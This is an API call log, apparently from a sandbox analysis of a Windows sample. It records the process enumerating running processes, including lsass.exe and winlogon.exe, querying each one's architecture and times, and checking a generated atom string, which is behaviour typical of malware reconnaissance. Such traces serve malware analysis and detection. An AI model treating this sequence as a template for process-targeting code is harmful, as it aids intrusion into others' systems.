	[0084.776] CloseHandle (hObject=0x67c) returned 1
	[0084.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.776] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x67c
	[0084.776] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.776] CloseHandle (hObject=0x67c) returned 1
	[0084.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x397e8c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x67c
	[0084.777] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.777] CloseHandle (hObject=0x67c) returned 1
	[0084.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x396eab0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x67c
	[0084.777] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.777] CloseHandle (hObject=0x67c) returned 1
	[0084.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x67c
	[0084.777] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.777] CloseHandle (hObject=0x67c) returned 1
	[0084.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x396ea50, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.777] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x67c
	[0084.777] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.777] CloseHandle (hObject=0x67c) returned 1
	[0084.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39a1b78, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0084.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x67c
	[0084.778] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.778] CloseHandle (hObject=0x67c) returned 1
	[0084.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39a1880, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0084.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x67c
	[0084.778] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.778] CloseHandle (hObject=0x67c) returned 1
	[0084.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.778] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x67c
	[0084.778] GetLastError () returned 0x5
	[0084.778] GetLastError () returned 0x5
	[0084.778] GetLastError () returned 0x5
	[0084.778] GetLastError () returned 0x5
	[0084.778] GetLastError () returned 0x5
	[0084.778] GetLastError () returned 0x5
	[0084.778] GetLastError () returned 0x5
	[0084.778] GetLastError () returned 0x5
	[0084.778] GetLastError () returned 0x5
	[0084.778] GetLastError () returned 0x5
	[0084.778] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.779] GetLastError () returned 0x5
	[0084.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.780] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0084.780] GetProcessTimes (in: hProcess=0x67c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] GetLastError () returned 0x5
	[0084.780] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0084.780] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.781] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetLastError () returned 0x5
	[0084.782] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.782] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0084.783] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.783] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0084.783] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0084.783] CloseHandle (hObject=0x67c) returned 1
	[0084.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0084.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x397e9b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0084.783] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eaa0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.783] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x67c
	[0084.783] IsWow64Process (in: hProcess=0x67c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.783] CloseHandle (hObject=0x67c) returned 1
	[0084.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x397e8c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.784] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0084.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x397e9b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x17078) returned 0xc0000004
	[0084.848] VirtualAlloc (lpAddress=0x0, dwSize=0x17178, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0084.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x17178, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0084.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0084.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x397e8c0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0084.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0084.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e9b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0084.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.852] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0084.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x397e8c0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0084.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0084.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x397eab8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0084.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x397e9c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.853] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0084.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0084.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0084.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x76c950, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0084.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0084.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0084.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0084.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0084.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0084.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0084.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0084.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x6a0
	[0084.856] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.856] CloseHandle (hObject=0x6a0) returned 1
	[0084.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x397e8c0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0084.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0084.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x396ea50, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x6a0
	[0084.856] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.857] CloseHandle (hObject=0x6a0) returned 1
	[0084.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x396e930, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0084.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0084.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x6a0
	[0084.857] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.857] CloseHandle (hObject=0x6a0) returned 1
	[0084.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e9f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x6a0
	[0084.857] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.857] CloseHandle (hObject=0x6a0) returned 1
	[0084.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x6a0
	[0084.858] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.858] CloseHandle (hObject=0x6a0) returned 1
	[0084.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x6a0
	[0084.858] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.858] CloseHandle (hObject=0x6a0) returned 1
	[0084.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x396eab0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x6a0
	[0084.858] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.858] CloseHandle (hObject=0x6a0) returned 1
	[0084.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x397ea88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x6a0
	[0084.858] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.858] CloseHandle (hObject=0x6a0) returned 1
	[0084.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0084.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
